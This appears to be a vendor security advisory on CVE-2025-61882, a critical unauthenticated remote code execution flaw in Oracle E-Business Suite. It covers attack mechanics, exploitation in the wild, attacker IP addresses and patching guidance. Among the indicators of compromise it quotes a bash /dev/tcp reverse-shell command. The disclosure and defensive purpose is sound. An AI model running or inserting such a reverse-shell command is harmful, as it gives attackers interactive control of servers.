A critical security vulnerability has been disclosed in the widely used Oracle E-Business Suite (EBS). Tracked as CVE-2025-61882 with a CVSS Base Score of 9.8 (Critical), this flaw affects versions 12.2.3 through 12.2.14. If successfully exploited, this exposure allows unauthenticated attackers to perform remote code execution (RCE) over a network without needing any user credentials. Given that the vulnerability is already accompanied by Indicators of Compromise (IOCs), organizations running affected versions should consider this an immediate, top-priority threat.
Summary
Vulnerability: Remote Code Execution (RCE) due to a flaw in BI Publisher Integration within Oracle Concurrent Processing.
CVE: CVE-2025-61882
Impact: Unauthenticated, remote code execution. Full compromise of the affected system and potential data loss or service disruption.
Affected Versions: Oracle E-Business Suite versions 12.2.3 through 12.2.14.
Severity: Critical, CVSS 9.8
Fix: Apply the necessary updates provided in Oracle's Security Alert. The October 2023 Critical Patch Update is a prerequisite.
How the attack works
The core of CVE-2025-61882 is a vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within EBS. The vulnerability resides in a network protocol endpoint that is accessible without authentication. An attacker can remotely exploit this weakness over a network without needing a valid username or password. This access allows the attacker to execute arbitrary code with the privileges of the affected service, leading to Remote Code Execution (RCE). Observed Indicators of Compromise (IOCs) suggest attackers are leveraging this flaw to establish outbound TCP connections, likely for a reverse shell (sh -c /bin/bash -i >& /dev/tcp// 0>&1), which grants interactive command-line access and complete control of the compromised server.
Exploitation in the wild
Oracle has released an advisory due to the severity of the threat, and associated IOCs confirm that threat actors are actively probing for and exploiting this exposure. Specific IP addresses (e.g., 200.107.207.26 and 185.181.60.11) and exploit files (referenced by SHA 256 hashes) point to active reconnaissance and execution attempts against internet-facing EBS instances. The simple, unauthenticated nature of the exploit makes automated scanning and mass exploitation trivial for cybercriminals.
What makes this so dangerous
This vulnerability combines several factors that elevate it to a top-tier security risk:
- Critical CVSS score: A CVSS score of 9.8 signifies maximum severity, indicating the exploit is highly impactful and easily accessible.
- Unauthenticated RCE: The attack requires no user credentials or interaction, meaning any internet-facing system running a vulnerable version is exposed to the threat.
- Full system compromise: Successful exploitation results in Remote Code Execution, granting the attacker complete control over the affected Oracle EBS server.
- Clear IOCs: The public existence of IOCs (including specific IP addresses and reverse shell commands) confirms this is not a theoretical threat but is being actively targeted in the wild.
Mitigation steps and best practices
The window of exposure is zero. Administrators must act immediately to secure their environments.
- Apply patches immediately: Oracle strongly recommends applying the updates provided in the Security Alert as soon as possible.
- Patch prerequisite: Ensure the October 2023 critical patch update is applied, as it is a prerequisite for the application of this Security Alert.
- Monitor for IOCs: Security teams must immediately check logs for activity associated with the provided IP addresses and look for signs of the reverse shell command to support hunting and containment.
- Restrict network access: Limit network access to the Oracle Concurrent Processing component and the BI Publisher Integration to only trusted internal networks or specific administrative hosts.
Continuous detection: Actively monitor internet-facing assets for newly emerging, unauthenticated exposures like this one to ensure a rapid response process is in place, shortening the window of opportunity for sophisticated attackers.
{{cta-demo}}
